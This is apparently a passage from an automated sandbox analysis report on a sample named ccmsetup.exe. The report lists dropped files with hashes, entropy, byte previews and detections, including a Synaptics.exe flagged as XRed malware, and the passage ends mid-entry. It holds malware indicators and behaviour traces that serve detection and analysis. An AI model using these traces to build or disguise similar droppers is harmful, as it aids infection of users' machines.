                                                                                        Entropy (8bit):3.7161279228518382
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:RSIU6o7wVetbqx+6d74TYiSeQE/v/c5aM4UU89bPzpsfa9rm:R6l7wVeJqx+6aYiSeUprU89bLpsfa5m
                                                                                        MD5:7F2353F5265ED12AE2BB9A4BEA135475
                                                                                        SHA1:AC7144528D2C12233D7FAD239F5A668C872E07CE
                                                                                        SHA-256:C1D489156061E58C52CF73CEC81B938C9A1BFD89AC0FC6951A54F4FF556A65B5
                                                                                        SHA-512:56DD3AB034D820CAC6748E7520AE1C7099BFF73464DD21974577AC43F3B1ABE4207F6C2B5E4F73F6C82B723E902285659CF4394A7317291BBF703FEC2EC6DC7F
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.0.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4E0.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.444101908500219
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZ0Jg77aI9ZbSWpW8VY61Ym8M4JFQFS+q84GNZad:uIjfMI7fbz7VKJp0NZad
                                                                                        MD5:458C905859A7DB5E3F1DEBB80A87E8FF
                                                                                        SHA1:811D48D93337EC09592F82B0F2BC7BFFB677C55A
                                                                                        SHA-256:3AE59709DC6BB00DB78FBABA7E5E5FCDA5AAB69CA9B2A6BB5A59D588271F7AA0
                                                                                        SHA-512:A0967943BB1CD26A3B04E64F01CD5EC9DB5ACD0AF7780DD4F14110EDD637EE4E98A175C21624DFA07C0CD5C6DACC6781B110DE709751A39368E84DEBE311F403
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618533" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA79.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Dec 5 21:51:07 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):4972638
                                                                                        Entropy (8bit):2.1605673752119117
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:gaG+XN1H4nQT1lSOF/CXNt9iQz8xFK0CZFUvobdoIpk5teqdOPjyozwT79bTxXrL:g6N1H4nQhhCXN/F8j9jvg7pk5W
                                                                                        MD5:5AAADBFAA6C5F580074A5F198E2823EF
                                                                                        SHA1:1AEAC8A82E04F6A1FD66CF77ADF1A7F011197BAD
                                                                                        SHA-256:FFB37CD69704FDD5F08A46C6EA8B26925CB7D034777D0288BA233E34A1CEB366
                                                                                        SHA-512:51DB1C67B9DA69FCEE94F688FB64AAAB5404B3B5E70E12A1CA37F7C775DDA1DE3021F4F673184A1D61EA348B739D12D6B00F1E082CFCD590227836FDD0BF758A
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... .......K Rg.............T..........$%...[......$...<............t..........`.......8...........T.................J.........`...........L...............................................................................eJ.............GenuineIntel............T............ Rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6304
                                                                                        Entropy (8bit):3.713075079899843
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJqxJ6R2YiSqSypDZ89bypsf6Gm:R6lXJE6AYS8yCfS
                                                                                        MD5:44EC61504ABA9A46EA474A5649454751
                                                                                        SHA1:5490A084922CCF18A7DF7D6BAAC57AE65F9169A9
                                                                                        SHA-256:03F5D92E6C4C4007DEDDBDC12AA00C2355BC27DAC38B240D51B9C368345658B4
                                                                                        SHA-512:43B4393B1AF4BDA7522BAAAACFF1DAE3643467523A4EE485BF094CC7560C89FDEDB83EB39B363B04896B59879FB4F6D8DD7F8CC00546F82E0C3022AE81223EF9
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.0.<./.P.i.

                                                                                        C:\ProgramData\Synaptics\RCXD7AF.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.645638500999874
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I+r:ansJ39LyjbJkQFMhmC+6GD9d
                                                                                        MD5:020E869138373254D25D50294CEB45AF
                                                                                        SHA1:FA802F233890198365C3273DEF15399F074610C5
                                                                                        SHA-256:3EFD789B8DDF86A424BB238DACC61F92D1665094CA892543359D6F0A33FC87A7
                                                                                        SHA-512:EE4715D5E56FD79D93447FF2802E0676B21CC8A9744F874B16B27B25BC45B796DB46CC2DA05B7FCC27CE53FCD0A3A136308B6AC02E77513F82F822D8BCF4612D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXD7AF.tmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXD7AF.tmp, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                        C:\ProgramData\Synaptics\Synaptics.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):4873728
                                                                                        Entropy (8bit):5.56388575934556
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GDfmrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP8B:gnsmtk2aWmrE906DDnjpREFgBIi9/
                                                                                        MD5:823444545911FD17E953437B7C712F2F
                                                                                        SHA1:6D1C0B1C3CAADE86C13196A0763538D0EE29322E
                                                                                        SHA-256:845B6F57D33B26DD409AE897707E4A5141991DF780983593965983D95C06C67D
                                                                                        SHA-512:51692B5D995081627364345FF73D2F16C573A1CDBCCF6130E0EE76417DECDF2B57BF09D8C242C709642E9C40D2482E6CCD6ECDA99C932B10FAC1D8AC44D3367B
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................@...................@...........................J..................@..............................B*......`.?..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...`.?.......?.................@..P....................................@..P........................................................................................................................................

                                                                                        C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\AppData\Local\Temp\2a2ZfJ6.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.271852502936651
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                        MD5:A06212119ED7CB88ABCD87AF16739ADF
                                                                                        SHA1:44FF256D9D0F1BB5F3C37F497EF2A21018CD3887
                                                                                        SHA-256:3AD1ABF4A585BAB5500FECA053AA1D67ACF83A566C170C4705ACA094811C903E
                                                                                        SHA-512:9BE718E62CFBF19D99A847E90D9BBF7901F341D2A5E2ED76AE9879F12F6862574640D4DB4A83712E2E73413FED24D9B1857914337F508C9BEA7DA14960502B0A
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="c3A8JAfQanX4XPeDWHYLsg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\81ttgaz.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2508665537285655
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+03LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QL+pAZewRDK4mW
                                                                                        MD5:B9F80DC5703567377995FD02F3F70C5F
                                                                                        SHA1:B108751C66A1EC2714FBD4749FF05ACD3EEB1A85
                                                                                        SHA-256:7B55882DD0DD775FBFF334838D90473CD32D802F82FF66027AF4E812E42F5DB9
                                                                                        SHA-512:77A9F4ADAC8667189FF1478E6F6395317005E988148C6E939D3D3FC582E4DEF4289E2CFFD8015D4E44C777B1A5F5687CA3AC6D090762957738F808BB12D498A9
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yxY5SYo80Nf-C-slhUKmdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\AsR9C3e.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267338457240888
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4C+pAZewRDK4mW
                                                                                        MD5:5D2AD27ED369A58F80C472C0D677C37C
                                                                                        SHA1:836CF41EA19B58989DA0539AB3487B4B2B007160
                                                                                        SHA-256:F867AFF7A0FDDB11E0189456045BCE27DEC3362D5F6297CE8EF6B10931F0689C
                                                                                        SHA-512:4443F4CEE9D637C4846BBC271D6E68D7E5C8A3FDA87E5FEBF3C35EA666470F6916CE6B120E1A1B85F5FAF01F571C662FBD94A839A8E1BD4EAB2BA82E20E107C1
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TfrLKbnafYZU7biZJF9qXQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\BoqMyvy.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2600506177670106
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0asSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Fs+pAZewRDK4mW
                                                                                        MD5:8DB4F15730583C1ACE1317FC607FD811
                                                                                        SHA1:B14373067584FB8CE5676946D8AB70C3485020B8
                                                                                        SHA-256:3F8842370DA5D2CEA3D1A1ADC43B157444D1FB1176CFC6130AEC818B414749A9
                                                                                        SHA-512:BEECD575D83CFAACB65A3C70EB2C1AE8D1F4DCA10C76134B359CEBDD9DBE034E1945EBEA061843ECA1EF82DA71127014046908CD2120F830C2F15E05F4423687
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zD_pnWwNzLDcisqMtcOYNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\JdE8rnq.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.259000875197374
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                        MD5:4790EA6A2A7BECAECF402E05361F4952
                                                                                        SHA1:BD34BD5DBE9A5D17C3562EDEF70B88B4A76BD0A7
                                                                                        SHA-256:57F25E69B4C2BFE0A8369B42370CF761A17AC0D9EE87729419995F3C043B4201
                                                                                        SHA-512:977E382E5678D5755C1E1DBDA6F4B24C8CA3B7DF7FFBDEF07D5082A303354BC99A16F8F5CBB3F4424163FCEF1874DD4312421D2D34721C7E780203E1BE674159
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KmuNTbx5iKT1NoAmyFlDZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\QJ3HIbg.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.25028293661055
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+05ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                        MD5:072C47C3B82158472ADDC7835AE1CA15
                                                                                        SHA1:221CFA6DD07A4362DD383F21D9B1E6A0D196A4F5
                                                                                        SHA-256:05A1DFDD37095DAE33D8020B4418742006C7617B9AFE2D74A669882290F75D6C
                                                                                        SHA-512:932A5009DEE46F4F5FDD5569E0FCFCB4BB846E178DA17DCE7D271B67FC3AD276DFC079C78911E7F4A7BF14C8D32BF5110B55C7AA7CE4A59491CB1052560DDCF1
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OpvS3h4Yem2aJRydwN-4dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\Rv6IZJ1.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.26037955444317
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0SkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                        MD5:DF72DFC3EB346D1355211A06C5EE6AAB
                                                                                        SHA1:7B9FC63EEA9EE8AB5DD3A91686291EFBAF4465F3
                                                                                        SHA-256:C66D795F406B559A0F94C79865A2F74A03ACDFBE77224B1E17BAFEEF657E2C4F
                                                                                        SHA-512:54470A6CB39447CDE1DB9C47454600007EF115D4A101367775ED6D3139F10B53691C0D083DAE823B3EA83BB0BD0EAB1990A290D17EE601497CAF69919DB7FCA1
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ga2RptJHFckM_H-v3Gy4Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\aOkCiDht.xlsm

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                        C:\Users\user\AppData\Local\Temp\iaSUNtv.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.264362717437775
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0gLSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1L+pAZewRDK4mW
                                                                                        MD5:F4754A64F04BD9A28FF774F96F70D5F4
